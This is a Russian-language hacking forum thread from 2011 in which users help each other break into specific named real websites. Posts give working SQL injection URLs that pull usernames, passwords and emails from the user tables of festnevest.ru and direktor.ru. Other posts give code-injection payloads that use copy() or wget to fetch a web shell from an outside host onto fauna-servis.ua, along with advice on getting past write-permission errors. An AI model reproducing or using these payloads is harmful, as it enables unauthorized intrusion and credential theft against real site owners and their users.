19.12.2011, 02:53
|
|
Новичок
Регистрация: 04.11.2004
Сообщений: 5
С нами:
11322426
Репутация:
0
|
|
wkar, file_get_contents - это не RFI. Можно только читать файлы.
|
|
|
19.12.2011, 16:22
|
|
Познавший АНТИЧАТ
Регистрация: 12.07.2010
Сообщений: 1,546
С нами:
8334326
Репутация:
75
|
|
Всем привет, подскажите почему не выводит нифига?
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//festnevest.ru/photo_php.php?id=6+or+1+group+by+concat%28%28select+email+from+u1419187_alpha.jos_users+limit+1,1%29,floor%28rand%280%29*2%29%29having+min%280%29+or+1--+
[/COLOR][/COLOR]
|
|
|
|
19.12.2011, 16:39
|
|
Познавший АНТИЧАТ
Регистрация: 12.07.2010
Сообщений: 1,546
С нами:
8334326
Репутация:
75
|
|
Сообщение от Nightmarе
Твоя команда limit+1,1 выводит ВТОРОГО пользователя, а не первого, а в таблице он всего один.
Пруф:
Код:
http://festnevest.ru/photo_php.php?id=6+or+(@:=1)||@+group+by+concat((select+concat_ws(0x3A,username,0x3a,password,0x3a,usertype)+from+u1419187_alpha.jos_users+limit+0,1),@:=@-1)having+@||min(@:=0)--+
ясно, спасибо
блин, немогу подобрать количество колонок
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.direktor.ru/opinion.htm?id=7+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--+
[/COLOR][/COLOR]
уже закоелебался, хелп, каким софтом ваще их можно подобрать, уже заколебало в ручную
|
|
|
|
19.12.2011, 16:54
|
|
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
С нами:
8728261
Репутация:
211
|
|
как сюда шелл залить?
http://www.fauna-servis.ua/forum/profile.php?mode=editprofile&e=phpinfo%28%29;
Сообщение от qaz
ясно, спасибо
блин, немогу подобрать количество колонок
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.direktor.ru/opinion.htm?id=7+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--+
[/COLOR][/COLOR]
уже закоелебался, хелп, каким софтом ваще их можно подобрать, уже заколебало в ручную у тебя тут похоже эррор бейсед |
|
|
|
19.12.2011, 17:00
|
|
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
С нами:
8328566
Репутация:
935
|
|
Сообщение от qaz
блин, немогу подобрать количество колонок
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.direktor.ru/opinion.htm?id=7+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--+
[/COLOR][/COLOR]
уже закоелебался, хелп, каким софтом ваще их можно подобрать, уже заколебало в ручную
Код:
http://www.direktor.ru/opinion.htm?id=7)+and+false+union+select+1,(select(@x)from(select(@x:=0x00),(select(0)from(u13567_doy.userlist)where(0x00)in(@x:=concat(@x,0x3c62723e,Name,0x3a,Pass,0x3a,IsAdmin))))x),3,4,5,6,7,8,9,10,11,12,13,14--+
Сообщение от 547
как сюда шелл залить?
http://www.fauna-servis.ua/forum/profile.php?mode=editprofile&e=phpinfo%28%29;
e=copy($_GET[shell],$_GET[save]);&shell=http://ссылка_до_шелла/shell.txt&save=/куда/сохранить/полный/путь/шелл.php
|
|
|
|
19.12.2011, 17:03
|
|
Постоянный
Регистрация: 30.08.2010
Сообщений: 327
С нами:
8263766
Репутация:
11
|
|
Сообщение от 547
как сюда шелл залить?
http://www.fauna-servis.ua/forum/profile.php?mode=editprofile&e=phpinfo%28%29;
у тебя тут похоже эррор бейсед
пробуй так
wget http://твой сайт.com/shell.php
или copy("http://твой сайт.com/shell.txt","/твой путь на машине/shell.php")
|
|
|
|
19.12.2011, 17:15
|
|
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
С нами:
8728261
Репутация:
211
|
|
Сообщение от Expl0ited
e=copy($_GET[shell],$_GET[save]);&shell=http://ссылка_до_шелла/shell.txt&save=/куда/сохранить/полный/путь/шелл.php
не получиться:
Warning: copy(/var/www/faunaservis/fauna-servis.ua/forum/cache/xxx.php) [function.copy]: failed to open stream: Permission denied in /var/www/faunaservis/fauna-servis.ua/forum/includes/usercp_register.php(825) : regexp code(1) : eval()'d code on line 1
я уже что только не пробовал...
fopen,include,file_get_contents,copy.....
|
|
|
|
19.12.2011, 17:17
|
|
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
С нами:
8328566
Репутация:
935
|
|
Сообщение от 547
не получиться:
Warning: copy(/var/www/faunaservis/fauna-servis.ua/forum/cache/xxx.php) [function.copy]: failed to open stream: Permission denied in /var/www/faunaservis/fauna-servis.ua/forum/includes/usercp_register.php(825) : regexp code(1) : eval()'d code on line 1
В ошибке же ясно написано Permission denied, ищи директорию на которую хватит прав для записи.
|
|
|
|
19.12.2011, 17:20
|
|
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
С нами:
8728261
Репутация:
211
|
|
Сообщение от Expl0ited
В ошибке же ясно написано Permission denied, ищи директорию на которую хватит прав для записи.
я понимаю, я уже перепробовал директории, не хватает прав, еще идеи будут?
|
|
|
|
19.12.2011, 17:20
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
Сообщение от 547
я понимаю, я уже перепробовал директории, не хватает прав, еще идеи будут?
залей шелл в тмп и инклуди, если так хочется
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
